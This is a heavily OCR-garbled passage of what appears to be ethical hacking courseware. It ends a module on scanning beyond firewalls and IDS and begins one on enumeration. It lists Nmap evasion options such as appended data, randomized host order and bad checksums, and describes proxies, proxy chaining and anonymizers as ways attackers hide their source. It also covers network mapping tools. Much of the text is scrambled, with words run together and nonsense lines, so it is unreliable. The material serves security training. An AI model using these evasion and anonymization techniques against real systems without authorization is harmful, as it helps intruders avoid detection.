or \XAA\xBB\xCC\xDD\xEE\xFF<...>.
To perform
a byte-order
conversion, the
specified
information
shouldbebasedon thereceiver's expectations.
Attackerscan use
this technique
to scan the targetbymanipulating
the firewallsbyappending
custom

Example:
ordata
binary hex to the sent packets.
--data Oxdeadbeef (or) --data \xCA\xFE\x09

ical andCountermensores
Mackin ©by E-Comel
Copyright
Targee[101010:0 Profi
Command:
[nmap endo
10107010
d ota

Heats
|| | [omap
Senices Nmap
Output Ports/Hosts Topology
Hos Detais Scant

5dat
08 « Host = 10101010 Oadeadbeet
© 0101010 7.7
/owap.0re
)at 2089-06-27

Not_shoun:
filtered
997 ports

5357/tepopen wsdoph
HAC.
Addeess:00: 0¢129:02:96:A4
(VMware)
aan_done:1 IP adress (2 host
up) scanned in 4.81 seconds v

Figure ofappending
3.94:Screenshot binarystingin Zenmap
Creating CustomPacketsbyAppending CustomString
Attackerssendregular stringsas payloads
i n the packets
sent to the targetmachinefor
scanningbeyond the firewall.TheoptionusedbyNmap
the sent packets
is --data-string
and a fewcharacters depend can string
on the system's
to
for appending
<string>. The<string>
location;
however,
a custom string
contain any
it is not guaranteed

andspecial characters double

whetherthesameinformationis retrieved.Thestringis enclosed
technique
with
fromtheshellare not used.Attackerscan use this
quotes(*―)
to
scan the targetbymanipulating
packets. the
firewalls string
data
byappending custom to the sent

Example:
--data-string "Scan conducted by Security Ops, extension
(or)--data-string
7192" "Ph34r my 133t skills".

ical andCountermensores
Mackin ©by E-Comel
Copyright
San Teele Brie Hep

Data
eye ://oeap.ore
)ot 2019-06-27 14:58

Creating
395:Sereenshot
Figure
CustomPacketsbyAppending
of appending
custom

RandomData
string
inZenmap
append
‘Attackers a numberof randomdatabytes to most packets
sent without usingany
protocol-specific
payloads.
TheoptionusedbyNmap forappendingrandomdatato the
sent packetsis --data-length<number>. For protocol-specific and no random
payloads,
affected,
--data-length
as probe 0
is needed
consistency
The (-0)OSdetectionpackets
is used.
for it to be accurate.Bydefault,
are not usually
a few UDPports

get
a
andIPprotocols custom
the
payload. Attackers
bymanipulatingfirewallsbyappending can
use
this to
techniquescanthetarget
randomdataor numbersto the sent packets.
Example:--data-string 1 (or) --data-string5

ical andCountermensores
Mackin ©by E-Comel
Copyright
 San Teeleelle Help
Tage {101010:10 Profile
Command:
[nmap
101010: -det-sing §
Hosts) Seviees
05 + Host
| PortsNmap
Output /Hosts

map 1010:10.10-date-singS
Topology
HostDet Scan
eta
@ ro1a1010
( Stacting ap

latency).
ost {5 up (0,008
7.70 netos://omep.oce ) a€2019-06-27 14:56

Net shown;997 ¢laterea ports

5357/tepopen wsdapt
AC Address:0 00c!29:02:96:44 (\Mmare)

rs
inap-dene: 1P
1 adaress(1

hostup) scanned in

3.96:Screenshot
Figure of appending
random
string inZenmap

03
Module 259
Page tical andCountermensores
Making Copyright©
by Comet
 7
Randomizing
HostOrder and Sending
BadChecksums CEH
Randomizing
HostOrder Sending
BadChecksums

(©
Aackers
i ofin
can the cumber hosts the target
network random
targetthatsbehind
ordert o scan an intended
3 firewall
“errachrs
ehecksumssend
with
intended
othe
Frowaluses tocertain
packets TER/UPD
bador bogus
target avoid

HostOrderand Sending
Randomizing BadChecksums
Randomizing
HostOrder
‘The
attackerscans the numberof hostsi n the target
network i n a randomorder to scan the
intendedtargetthat is lying thefirewall.
beyond TheoptionusedbyNmap to scanwith a random
hostorderis --randomize-hosts.
Thistechnique instructs Nmapto shuffleeachgroupof 16384hostsbeforescanningwith slow
timingoptions, thusmaking the scan lessnotableto networkmonitoring
systems andfirewalls.
If group
sizes
are the
larger
shouldbe compiled
randomized,PING_GROUP_SZ shouldbeincreasedi n nmap..h
again.Anothermethodcan befoliowedbygeneratingtargetIP with
the list scan command~s~ -n ~oN <filename> andthen randomizing
and it
the list
it with a Perlscript

the using
andproviding whole
listto Nmap the -41 command.

ical andCountermensores
Mackin ©by E-Comel
Copyright
 =e
inn
genes
(2vo) §
1.3? asaress most scannea in

‘Sending
BadChecksums
Figure
in
397;Sccenshot
of randomiing
hosts Zenmap

Theattackersendspackets with bad or bogusTCP/UPD checksums to the intendedtargetto

avoidcertain firewallrule sets.TCP/UPD checksumsare usedto ensure dataintegrity.Sending
packetswith incorrect checksums can helpattackersto acquire informationfrom improperly
configured bychecking
systems foranyresponse.
If thereis a response,
thenit is fromthe IDSor
firewall,whichdid not verifytheobtainedchecksum. If thereis n o responseor the packets
are
dropped, thenit can beinferred that thesystemis configured.Thistechnique instructsNmap
to
sendpackets with invalidTCP, UDP, or SCTPchecksums to the targethost.Theoptionusedby
Nmap
is --badsum,

Series]
_Nnap Host
Scans
Oost Pats Hess Teplgy Oe

Sceenshotof scanning
Figure3.98: bad checksums
bysending

ical
Zenmap
in
andCountermensores
Mackin ©by E-Comel
Copyright
 ProxyServers
A prony
serve i an

that
application can serve asa forconnecting
intsrmesiary with
other
computers
@ Priest musts sana macnn te on

WhyBitackers
© we rmasi
nescuat soure of an attack the fake
byimpersonating
sourceadores f the

Servers?
“otc a
requests
sean8ed sc
srt
httins
ya ran them destin

@ eerie
"Note:
pony
serverst
Asearchin
mile

wl st thousands
Google
sod

offre proxyservers
eteton

Servers
Proxy
‘A
proxy server is an application
that can serve as an intermediary
for connecting
with other
computers.
A proxyserver is used:
+
Asafirewallandto protectthe localnetworkfromexternalattacks.
=
Asan IP addressmultiplexer
that allowsseveralcomputers
to connect to the Internet
whenyou haveonlyone IPaddress (NAT/PAT).
To anonymizewebsurfing(tosome extent).
material(using
To extract unwantedcontent,suchas adsor “unsuitable― specialized
proxyservers}
=
Toprovide
some protection
against attacks.
hacking
To save bandwidth
Howdoesa proxy server work?
Initially, a particular
whenyou use a proxyto request web pageo n an actualserver, the proxy
server receives it. Theproxyserver thensends to the actualserver on your behalf,
your request
It mediates
in the
betweenyou andtheactualserver transmit and
figure
below, to
to the request,as shown respond

ical andCountermensores
Mackin ©by E-Comel
Copyright
 Target
Organization
Attacker

In
Figure server fr
3.99:Attacker usinga peony
connecting
tothe target

thisprocess,the proxyreceives the communication betweenthe clientandthe destination

application.
Totake advantage
of a proxy server, an attackermust configure
clientprograms so
thatthey c an sendtheirrequests to theproxyserver insteadofthefinaldestination,
‘Why Attackers UseProxy Servers?
It is easier for an attackerto attackor hacka particularsystemthanto concealtheattacksource.
the primarychallenge
‘Therefore,
betraced,Thus,
identity
for an attackeris to hidehis/her that he/she
theattackerusesa proxyserver to avoidattackdetectionbymasking
address.Whenthe attackeruses a proxyto connect to the target system,
socannot
his/her
the server logs
IP
will
recordthe proxy's source addressratherthanthe attacker'ssource address.
Proxy help
sites the attackerto browse the Internetanonymously andaccessblockedsites(ie.,
evadefirewallrestrictions).Thus, the attackercan surfrestricted sitesanonymously without
Usingthe source IPaddress.
Attackersuse proxy servers:
'*Tohide the actualsource of a scan andevadecertain IDS/firewall
restrictions.
=
Tohidethesource IPaddress
s o that they without anylegal
can hack corollary.
=
Tomasktheactualsource of the attackbyemploying of the proxy.
a fakesource address
To remotely access intranets andotherwebsiteresources that are normallyoff limits
To interrupt all the requestssent bya user and transmit them to a third destination;
hence,victims will only be ableto identify
theproxyserver address.
To chainmultiple
proxyservers to avoiddetection.
FreeProxy
Servers
Somefree proxyservers availableon the Internet, helpyou to access restrictedsites
whichcan
without revealing
yourIPaddress.In the Google Proxy
searchengine,type“Free Servers"to see
alist one
this
of suchservers.Select from list anddownload install
without revealing
your legitimate
IPaddress. anditto
browseanonymously

ical andCountermensores
Mackin ©by E-Comel
Copyright
‘An
is proxy
server,
that a
anonymous

trough
awe works
also called CSI

4
8 server

al
roxy, form

that are 11000

‘9
BestFreeProxyServersforAnonymous
WebSurfing Lien
-
Free WebProxy

KPROXY -
WebProxyAnonymous
Anonymous
Free Proxy -

3.100:Free
Figure
Prony
Servers

ical andCountermensores
Mackin ©by E-Comel
Copyright
 ProxyChaining

(©
"royce athe
asr’
©vserreqvets resourceom
ote
the destination

prony to
connects ad pues
verve the request ons?

@ Tr roy sp thewer entation omiton an

serve pases theeqs one ony eer

©Tsprocessis
repented yale prow the i n
servesin

©* theendte unencrypted

web
requestpassed
tothe server

_
a
ProxyChaining
Proxy
chaining
helps
a n attackerto increase his/her
Internet anonymity.Internet anonymity
depends
number
proxies
used
for the
on the of
of proxy servers used,the greater
fetchingtarget
is the attacker's
anonymity.
application;
the
larger
the
number
proxychaining
‘The processis described below:
Theuser requestsa resource fromthedestination.
‘A
proxyclientin the
the proxyserver. user's toa
system connects proxyserver and the requestto
passes
Theproxyserver
next proxyserver. strips
the user’s
identificationinformationandpassesthe request
to the

Thisprocessis repeated byall the proxy servers i n thechain

the unencrypted
Finally, is passed
request to the webserver.

»
.., 2
2

»8.. 8 ..,
fora te ror
Webserver
Figure3.201:
Proxy
Chaining

ical andCountermensores
Mackin ©by E-Comel
Copyright
 Tools
Proxy
Steer lows
Prony
|) anorimousiy
onthe
internet
you

withoutdelsingyor
| yout
to vberGhost ou
of
Your
srt
address
yberchoxt OP*SROSPNIdes
| reise th
thorallowing
one
st snonmously

pox door eyes

aia
i
fit i
i

Tools
Proxy
Proxy
tools are intendedto allow users to surfthe Internet anonymously
bykeeping
their IP
hiddenthrough
a chain
of SOCKS
or HTTP proxies.These
toolscan alsoact as HTTP,
mail,FTP,
SOCKS,
news,telnet,
andHTTPS
proxyservers.
Switcher
Proxy
+

Source:http://www
proxyswitcher.com
Switcherallows
Proxy
IPaddress.It alsohelps attackers
Internet
anonymously
disclosing
to surthe without their
attackersto access various blockedsites i n the organization.
In
it avoids
addition,
by
all sorts oflimitationsimposed target sites

ical andCountermensores
Mackin ©by E-Comel
Copyright
Bile6t_ Actions View Hep
7 Ex GOS EE7 ss"
boy
Sore
© 5)
Bien
EZ
AGS

TEE
iil
cone

600
ete
os
Ded]
efwnat
“Tet
Tt yar. ose mean CORE
MWC

tee
as
Oe)
become
cere
‘160253157 becausete.
120101465131
SSLTot Honea ratte estes

eed
[ma]
ve)comet
tendon
ve]
10513105
$7742190
1222018 meet
1062372213200
175.00
bacare

3.102 Screenshot
Figure of Prony
Switcher

CyberGhost
VPN
Source:https://www.cyberghostvpn.com
CyberGhost
VPN
hides
the attacker's
her to surf anonymously
connection anddoesnot keeplogs,
IPandreplacesit

thussecuringdata.
a selectedIP,
with allowing
himor
and access blockedor censoredcontent. It encrypts
the

ical andCountermensores
Mackin ©by E-Comel
Copyright
 VPNnot connected!

om
3.203:Screenshotof GberGhost
Figure
In additionto theproxytoolsmentionedabove,
thereare manyotherproxytools intended
to
allowusers to
surf
the Internetanonymously.
Someadditionalproxy toolsare listedbelow:
‘BurpSuite(https://www.portswigger.net)
Tor (https://www.torproject.org)
=
CProxy(hetpsi//www.youngzsoft.net)
Shield(https://www.hotspotshield.com)
Hotspot

ical andCountermensores
Mackin ©by E-Comel
Copyright
 ToolsforMobile
Proxy

1 Provyrneger

Tools for Mobile

Proxy
=
Shadowsocks
Source:https://shadowsocks.org
is a high-performance,
Shadowsocks cross-platform
secured proxy. It adopts
socks5
bleeding-edge techniqueswith asynchronous I/Oandevent-drivenprogramming.This
tool is availableon multiple
platforms, including
PC,MAC,mobiledevices(Android and
iS), and routers (OpenWAT). It is @low-resource-consumption
tool that is suitablefor
low-endboxesand embeddeddevices.It supports open-sourceimplementations in
python, node.js,golang,
CH,andpureC.
helpattackersto surfthe Internetprivately
‘Shadowsocks andsecurely,

ical andCountermensores
Mackin ©by E-Comel
Copyright
 Figure Screenshot
3.104 ofshadowsocks
=
ProxyDroid
Source:https://github.com
ProxyDroidis an app that can helpyou to set the proxy (http/socks4/socks5)
on your
Androiddevices.It supports HTTP/HTTPS/SOCKS4/SOCKSS proxyandalsosupports
basic/NTLM/NTLMv2 authenticationmethods.Attackerscan use thistool as a DNS
proxyto accessIP addresses thatare beyond thefirewalls.
BRIO 1207

Proxy
Chooseone
profile
Host

Port

Proxy typ

re 3.105: of PronyDroid
Screenshot

ical andCountermensores
Mackin ©by E-Comel
Copyright
Proxy Manager
Source:https://play.google.com
Proxy
Manager
is anotherAndroid-based HTTP/SOCKS4/SOCKSS
proxy tool that supports
proxyanduser authentication. attackersto surftheInternetanonymously.
It enables
=
1240

I ProxyManager
Proxy
Enable

Fetch
USAProxy

Proxy
Type

Proxy
Host

Proxy
Port

EnableUserAuthentication

AboutProxy
Manager

Sereanshat
Figure3206: of Proxy
Manager

ical
Mackin
and Copyright
©
by
E-Come
Countermensores
 Anonymizers
‘An
anonymierremave al deny Information
fromthe

anonyme makeactivity onthe Internetuntraceable

users
wile
thecompute user suc

Anonymeallowyouto bypass internet

censors

‘Whyaso an Anonymizer?
©
andPrvacy anonymity

against
©Protection
©Aces
onne atads

restricted
content
Knonymizers
anonymizer is an intermediateserver placed
‘An betweenyou as the enduser andthe websiteto
access on
website
the
your
behalf
allowsyou to bypass your
websurfing
activities
untraceable.
andmake
Internetcensors.An anonymizer eliminatesall the identifying
information
Anonymizers
address)
(iP
anonymizers
Internet
while surfing
fromyour system you are
can anonymize
services.
thereby
theweb (HTTP:),
the Internet,
(gopher:)
file transferprotocol (FTP:),
ensuringprivacy.Most
andgopher

Toawebsite
visit
the target
page
can
anonymously, preferred
field.
subsequent
to pointto an anonymizer
site
and
you visit your
your
to anonymize homeof
i n theanonymizationAlternatively,
anonymizer enter thename
you can set
webaccess.In addition,
browser page
you can chooseto
anonymously
information,
provide
proxyserver bymaking
passwords
any
andotherinformationto siteswithout revealing additional
configure
suchas your IP address. Attackersmay
the site name the settingfor the HTTP,
an anonymizer
FTP, Gopher,
as a permanent
andother proxy
optionsi n their application configurationmenu, thereby cloakingtheir maliciousactivities.
WhyUsean Anonymizer?
‘The
reasonsfor usinganonymizers
include:
Ensuring privacy: Protectyour identityby making your web navigationactivities
untraceable.Your privacyis maintained until andunlessyou disclose
your personal

‘Accessing
by out their
informationon the web,for example,filling forms.
government-restricted
citizens
content: Most governmentsprevent from
accessing
certain
websites
deemedor However,
or content
sitescan stillbeaccessed
inappropriatesensitive. these
usingan anonymizer locatedoutsidethe targetcountry.

ical andCountermensores
Mackin ©by E-Comel
Copyright
 onlineattacks:An anonymizercan protectyou fromall instancesof
Protectionagainst
online pharming
attacksbyroutingall customer Internettraffic via its protected
ONS
server

Bypassing IDSand firewallrules:Firewallsare typicallybypassed byemployees or

websitesthat theyare not supposed
students accessing to access. An anonymizerservice
getsaround your organization'sfirewall bysettingup a connection betweenyour
computerandthe anonymizerservice. Thus, firewallssee onlythe connection fromyour
computerto theanonymizer’s
webaddress. Theanonymizerwill subsequently connect
to any website(e.g.,
Twitter)with the helpof an Internetconnection andthendirectthe
content backto you.To your organization,
your system appearsto be simplyconnected
to the anonymizer’s
webaddressbut not to theactualsite that you are browsing.
In addition to usersidentities,
protecting can
anonymizers also be usedto attacka website
without being
traced,
Types
of Anonymizers
‘An
anonymizeris a service
services. It
are
encrypts
through
whichone can hideone’s
the datafromyourcomputer identitywhenusingcertain Internet
to the Internetservice provider.
of two basictypes:networkedanonymizersandsingle-point anonymizers.
Anonymizers

NetworkedAnonymizers
‘Anetworked anonymizer firsttransfers
your informationthrough a networkof Internet-
connected
computers
through iton
severalInternetcomputers, it becomes cumbersome the
beforepassing to thewebsite,Because informationpasses
foranyonetryingto track
your informationto establishthe connection betweenyou andthe anonymizer.

to
Example: If you want visit any web page,youhaveto makea request.
firstpassthrough A,B,andCInternetcomputers
Therequest
beforegoingto the website.
will

‘Advantage:
Complication
of the communicationsmakestrafficanalysis
complex.
Disadvantage:
Anymulti-nodenetworkcommunication incurs some degree
of riskof
confidentiality
compromising at each
node.
Single-PointAnonymizers
Single-point anonymizersfirst transfer your information througha websitebefore
sendingit to the targetwebsiteandthen passbackthe informationgathered fromthe
targetwebsiteto you via thewebsiteto protectyour identity,
Advantage: Arms-length communication hidesthe IP addressand related identifying
information.
Disadvantage: trafficanalysis.
It offerslessresistanceto sophisticated

ical andCountermensores
Mackin ©by E-Comel
Copyright
 7
CircumventionTools:Alkasir
Censorship and Tails CEH
Atkasir | ‘mest
ces rom
aV0,
crumventont | Snetrton any computer

CircumventionTools
Censorship
+
Alkasir
Source: https://github.com
Alkasiris a cross-platform, open-source, and robustwebsitecensorship circumvention
tool that alsomaps censorship patternsaroundthe world.Alkasirenablesattackersto
identify censored links.It keeps
theminformed aboutlinksthatare stillblockedandlinks
that are not blocked.

3.107:Sereenshotoflkasir
Figure

ical andCountermensores
Mackin ©by E-Comel
Copyright
 Tails
Source:https://tails.boumn.org
from a DVDdrive,
Tailsis alive OSthat users can run on any computer USBstick,
or SD
card.It uses state-of-the-art cryptographic
to
tools encryptfiles,emails,
andinstant
and
messaging. It allows attackersto use the Internet anonymously circumvent
censorship. It leavesn o trace on thecomputer.

Seeenshotof Tals
Figure3.208:

03
Module 275
Page ical andCountermensores
Mackin
©
Copyright
by E-Comel
 Anonymizers
| designed
‘Whonix torssvancedcurt
ana Psiphon| softwatethat allows
to
sur
attackers

©
x_n
PSIPHON
2)
ISCONNECTED

Knonymizers
anonymizer helps
‘An you to maskyour IPaddress without being
so that you can visit websites
tracked
or
suchas SSH,identified
while
VPN, yourand
keepingactivity identity It usesvarious techniques
protected.
andHTTPproxies,whichallowyou to accessblockedor censoredcontent on
the Internetwith omittedadvertisements.

ical andCountermensores
Mackin ©by E-Comel
Copyright
=
Whonix
Source:https://www.whonix.org

Whonixis
OS a desktopdesigned

fail-safe,
automatic,
for advanced
of common attackvectors whilemaintaining
and desktop-wide
securityandprivacy. It mitigates
Onlineanonymity
usability.
thethreat
is realized
via
use of the Tornetwork.It consistsof a heavily
reconfiguredDebianbasethat is run inside multiple virtual machines, providinga
substantiallayer
of protection
frommalware
and
address
leaks.
IP

309:
Figure Screenshot
ofWhonix

ical andCountermensores
Mackin ©by E-Comel
Copyright
 =
Psiphon
Source:https://psiphon.ca
Psiphon
is an open-sourceanonymizer softwarethat allowsattackers
to surfthe Internet
through it will automatically
a secure proxy.Afterinstallation, configure
the Windows
machine'sproxy configurations
i n sucha way that the networktraffic for the web
applications that operatethrough
andbrowsers theseconfigurations
will betunneled
through
Psiphon
©
Pveren3

©
FEEDBACK
apour

toss PSIPHONISCONNECTED
~

DISCONNECT

©
FastestCountry

Module
03 278
Page 1 countermensreCopyriht
©y -Comell
 for Mobile
Anonymizers

for Mobile
Anonymizers
+
orbot
Source:https://guardianproject.info
COrbot
is a proxyappthatallows otherappsto use theInternetmore securely.It usesTor
to encrypt Internettrafficandthen hidesit bybouncing through
a series of computers
aroundthe world.Tor is a freesoftwarethat provides
an opennetworkto help defend
your systemagainstany formof networksurveillancethat maycompromise personal
activities and relationships
freedomandprivacyas well as confidentialbusiness through
atypeof state security monitoring analysis.―
knownas “traffic Orbotcreates a truly
privateInternet connection.

ical
Mackin
and Copyright
©
by Countermensores E-Comel
 Psiphon
Source: https://psiphon.ca
Psiphon
is a circumvention tool developed
byPsiphon,
Inc.,whichusesVPN,SSH,
and
HTTPproxy technology
to provideyou with open and uncensored a ccess to Internet
Psiphon
content.However, doesnot increaseonlineprivacyandis not an onlinesecurity
tool
Feature:
Browser
‘©
or or
VPN
(whole-device)
justthe webbrowser.
mode:one can choosewhether
totunnel
everything
©. In-app
s tats:Thisletsyou knowhowmuch
trafficyou havebeenusing

03
Module 280
Page ical Mackin
and ©
Countermensores
Copyright
by E-Comel
OpenDoor
3.122:
Figure Screenshotofsiphon

Source:https://www.apple.com
is an app designed
OpenDoor forbothiPhoneand iPad;
it allowsattackersto browse
websitessmoothly
andanonymously.

Figure
3.113
of ScreenshotOpenDaoe

ical andCountermensores
Mackin ©by E-Comel
Copyright
 ModuleFlow CE
H
[Network
Scanning Port
and Concepts Service Discovery

Tools BD Gamer
Seanning osiscvery crating?
(05Fingerprinting)

Scanning
Beyond
IDSandFirewall

Draw Network Diagrams

A networkdiagramhelpsi n analyzing
the completenetworktopology. Thissectionhighlights
the
importanceof networkdiagrams,how to draw them,how a n attackeruses themto launchan
andthe tools
attack,
used them.
drawing
for

ical andCountermensores
Mackin ©by E-Comel
Copyright
 NetworkDiagrams
Drawing
(©Adiagram of
target
or
network
1©Network dgramsshow lose
an attacker
provides
physi paths
withvlusbleinformation
to a potential
target network
aboutthe
and ts arhitectre

Intranet Intranet

Seee

eens
Network Diagrams
Drawing
Drawing a networkdiagram helps an attackerto identify the topology or architecture of a target
network. Thenetworkdiagram alsohelps to tracethe path to thetarget hosti n the networkand
enablesthe attackerto understandthe positions of firewalls, IDS,routers,and other access
controldevices.Oncethe attacker
corweakpointsin thesesecurity
to find his/her
mechanisms.
way into thevictim'snetwork.
try
to
hasthisinformation,
Then,
he/she can findthe vulnerabilities
the attackercan exploit theseweaknesses

Thenetwork diagram
networkdiscovery
ofa networkdiagram
alsohelps

is shown
below.
network
administratorsuse
to manage
or mapping tools to drawnetworkdiagrams
theirnetworks. Attackers
of targetnetworks.An example

Intranet Intranet

BS82 &

3.14: Example
Figure
of Digram
Network

ical andCountermensores
Mackin ©by E-Comel
Copyright
 Network Discovery
and Mapping
Tools

heute

Network Discovery
and Mapping
Tools
Networkdiscovery andmapping toolsallowyou to view the map of your network.Theyhelpyou
to detectroguehardware andsoftwareviolationsand notify you whenever a particular
host
becomes active or goesdown.Thus, you can alsodetermineserver outages or problems
related
to performance. An attacker can use the same toolsto drawa diagram ofthetargetnetwork,
analyzethe topology, find the vulnerabilitiesor weakpoints,andlaunchan attackbyexploiting
theseweak
‘=
points.
NetworkTopology
Mapper
Source:https://www.solarwinds.com
TheNetworkTopology Mapper tool allowsone to automatically
discoverand create a

Layer of
networkmap the targetnetwork.It can alsodisplay
3 topology
2andLayer
router connections).
data(e.g.,
It can keep
in-depth
switch-to-switch,
trackofnetworkchanges
connectionssuchas OSI
switch-to-node,
andswitch-to-
andallowthe user to perform
inventorymanagement of hardwareandsoftwareassets,
Features:
© Networktopology
discovery
andmapping
discovers
‘Automatically theentire networkandcreates comprehensive
anddetailed
networkmaps
network diagrams
Export to
networkdiagrams
Exports
PNGformats to
Microsoft
Office®
Visio®,
OrionNetworkAtlas, and
PDF,

ical andCountermensores
Mackin ©by E-Comel
Copyright
 Networkmappingforregulatorycompliance
Allowsone to directly
addressPCIcompliance
and other regulations
that require
ofan network
maintenance up-to-date diagram
Multi-levelnetworkdiscovery
Performsmulti-levelnetworkdiscoveryto produce an integrated
OSILayer2 and
Layer3 networkmapthat includes
detaileddeviceinformation
ofchanges
‘Auto-detection to networktopology
Automatically
network
detects
new
scanning to
a
andchangesnetworktopology
devices withscheduled

Somenetworkdiscovery
of
Solar
Figure2:15;Screenshot Winds
Netwark Topology

and mappingtoolsthat an attackerc an

Mapper
use to create a networkmap
are listedbelow:

(https://www.manageengine.com)
OpManager
TheDude(https://www.mikrotik.com)
(http://nutsaboutnets.com)
NetSurveyor
NetBrain(https://www.netbraintech.com)
‘Spiceworks Tool(https://www.spiceworks.com)
NetworkMapping

ical andCountermensores
Mackin ©by E-Comel
Copyright
 NetworkDiscovery
Toolsfor Mobile
Seany ‘Network
Analyzer

Network Discovery

=
Scany
Tools for Mobile
Somenetworkdiscovery
toolsfor mobiledevicesare as
POG
follows:

Source:http://happymagenta.com
a networkscanner appforiPhoneandiPad,
‘Scany, scansLAN, Wi-Finetworks,websites,
and open ports,discoversnetworkdevices,and digsnetworkinfo. It supports
several
networking protocols technologies.
andanti-stealth networking
It is a multifunctional
instrument for findingconnecteddevices, lookingup detailed device information,
networktroubleshooting, scanningports,andtestingnetworksecurityandfirewalls.
Attackersuse this tool to scan both the LANandthe Internet,scan any IPaddressor
networkrange,perform hostname, devicename, MACaddress, andhardwarevendor
lookups,ping/trace hostswith integrated toolsandWHOIShostnames, IP addresses,
ASNs,
ete.

ical andCountermensores
Mackin ©by E-Comel
Copyright
 3.116:
Figure Screenshot
of Scary
NetworkAnalyzer
Source:https://play.google.com
NetworkAnalyzer can diagnosevarious problems i n the Wi-Fi networksetupor Internet
and it can alsodetectvarious issuesin remote servers basedon its wide
connectivity,
rangeof in-builttools.Attackerscan use it to perform ping, traceroute,
portscanning,
Whois,
lookup
activities.
andDNS

B88
_e
of Network Analyzer
3.117Sereenshot
Figure

ical andCountermensores
Mackin ©by E-Comel
Copyright
PortDroidNetworkAnalysis
Source:https://play.google.com
Attackerscan use PortDroidNetworkAnalysis
to perform
localnetworkdiscovery.
It is
alsoeffective the networkandperforming
i n analyzing portscanninga s wellas banner
grabbing
using certain protocols,
including
ssh,
telnet,http,https,
ftp,smb,
etc.

19216801 Fusean >

Sean

Figure
2.118Screenshot
ofNetwork
Analyzer

ical andCountermensores
Mackin ©by E-Comel
Copyright
 Module Summary

about
te
Drawing of targetnetwork
sagrams n d thee
snfiance i n providing auabe
Information networkand achitectureoan sacar
1Dinthenext
ben we
wl
dec
mule,
testers perform and
calleabouts
an
enumeration
in dei
to
howatackers,a
orton
wel as etcal hackers
argsbefore tack

Module Summary
Thismodulediscussed howattackers determinelive hostsfroma rangeof IP addresses by
sendingvarious ping scan requests to multiple
hosts.It alsodescribedhowattackersperform
differentscanningtechniques to determine open ports,services,service versions, etc.,on the
targetsystem.Furthermore, it explained how attackersperform banner grabbing or OS
fingerprintingto determinethe OSrunningon a remote targetsystem. It alsoillustrated various
scanning techniques that attackerscan adoptto bypass IDS/firewall rules and logging
mechanisms
discussion
andhidethemselves
on drawing
as usualunder
the target’s
networkdiagram network
traffic.
Finally, it ended
and its significance
informationaboutthe networkandits architectureto a n attacker.
with a detailed
i n providing valuable

In the next module,

we will discuss i n detail how attackers
as well as ethical
hackers
andpen:
testers perform
enumeration to collectinformationabout a targetbeforean attackor audit

ical andCountermensores
Mackin ©by E-Comel
Copyright
 Module 04:

Enumeration
 Module Objectives

Module Objectives
In the previousmodules, you learnedabout footprinting and networkscanning. Thismodule
covers the next phase, enumeration. Westart with an introductionto enumerationconcepts.
Subsequently, the module provides insightinto different techniques for Network Basic
Input/Output System (NetBIOS),
Simple NetworkManagement Protocol(SNMP), Lightweight
Directory AccessProtocol(LDAP), NetworkTimeProtocol(NTP), NetworkFile System (NFS),
Simple Mail TransferProtocol(SMTP),Domain Name System (ONS),Internet ProtocolSecurity
(IPsec),Voiceover InternetProtocol(VoIP),
remote procedure call(RPC),Linux/Unix,
Telnet,File
‘Transfer
Protocol
(FTP),Server
6 (IPv6), Message
(SMB),
Protocol
Trivial
andBorderGateway
FTP(TFTP},
Protocol(8GP)
enumeration countermeasures.
Block Internet version
enumeration. Themoduleendswith an overview of

At theendof thismodule,
youwill beableto:
+

=
Describe
concepts
Explain
enumeration
differenttechniquesfor NetBIOS
enumeration
‘Explain
‘+
techniques
different
Explain
differenttechniques
for SNMPenumeration
for LDAPenumeration
Explain
differenttechniquesfor NTPenumeration
Explain
differenttechniquesfor NFSenumeration
Explain
differenttechniquesfor SMTPandDNSenumeration
Explain
other enumeration techniquessuchas IPsec,
VoIP, Linux/Unix,
RPC, FTP,
Telnet,
TFTP, andBGPenumeration
SMB,1PV6,
Apply
enumeration countermeasures

Module a 4 ical andCountermensores

Mackin ©by E-Comel
Copyright
 ModuleFlow

[NetBIOS
Enumeration SMTP
and
DNS Enameration

LDAPEnumeration

Enumeration Concepts
In theenumerationphase,
networkshares,
vulnerabilities
attackers
enumerate usernamesandotherinformation

i n thetargetnetwork andexploit
on
Thisinformationhelps
andservices of networkedcomputers.
themto hackthe system.
the
attackersidentify
groups,

Differentsections of this moduledealwith the enumeration of differentservices and ports.

Before discussing the actual enumeration process, we introduce conceptsrelated to
enumeration.

ical andCountermensores
Mackin ©by E-Comel
Copyright
 1
What is Enumeration?
CEH
involves
aanatacker
byIntruders
on Enumerated
|@ Enumeration creating
active
Aenea racers
connectionswith targetsystem andpeeorming
“ected to gainmore formationaboutthe

target
queries
Nerworkshares

the outing ables

‘auc
and
Attackerswe extracted
information
to lent
for a system
points atacknd performpassword service setngs
Stackst o ai nunauthorizedaccesso information
systemresources nd FQDNdeals
‘NMP

Enumeration are conducted Users andgroups

techniques i n an intranet

Whatis Enumeration?
Enumeration
is the processof extracting names,networkresources,shares,
usernames, machine
andservices froma system In the enumeration phase,
or network. an attacker
creates active
connections with the systemand sendsdirectedqueriesto gain more informationaboutthe
target.Theattacker usestheinformation
collected usingenumeration to identify
vulnerabilities
in the systemsecurity,whichhelpthemexploit the targetsystem.In turn,enumeration allows
the attackerto performpassword
attacksto gain unauthorizedaccess to informationsystem
techniques
resources. Enumeration worki n an intranet environment,
In particular,
enumeration allowstheattackerto collectthe following
information:
Network resources SNMPandfullyqualified
=
domainname
=

=
Networkshares
Routing
tables
=
(FQDN)
details
Machinenames
*
Usersandgroups
=
Auditandservice settings

enumeration,attackers
During
=

maystumbleupona remote inter-process

and
Applications
banners
communication (IPC)
suchas IPC$
share, i n Windows,
whichtheycan probe
further to connect to an administrative
sharebybrute-forcing andobtaincomplete
admincredentials aboutthefile-system
information
listing
that
the
share
represents
Theprevious moduleshighlighted howattackersgather necessaryinformationabout a target
without any illegal enumeration activities maybe illegal
activity.However, depending on the
organization'spolicies
andthe lawsthat are i n effect.An ethicalhackeror pen tester should
alwaysacquireproperauthorizationbeforeperforming enumeration

ical andCountermensores
Mackin ©by E-Comel
Copyright
 for Enumeration
Techniques
Extractusernames using Extractinformation
u sing
emailIDs defaultpasswords

BruteforceActiveDirectory Extractinformation
u sing
[DNSZoneTransfer

Extractu sergroups
from Extractusernames

Windows
using
SNMP

for Enumeration
Techniques
Thefollowing
techniques
are usedto extract informationabout a target
+
Extract usernames using
emailIDs
emailaddress
Every
contains
a username and a domain
two parts,
“username@domainname.―
name, i n the format

Extractinformationusing default passwords

Manyonline resources provide a listof defaultpasswords assignedbymanufacturers to
their products.
Usersoften ignorerecommendations to change the default usernames
and passwords providedbythe manufactureror developer of a product.Thiseases an
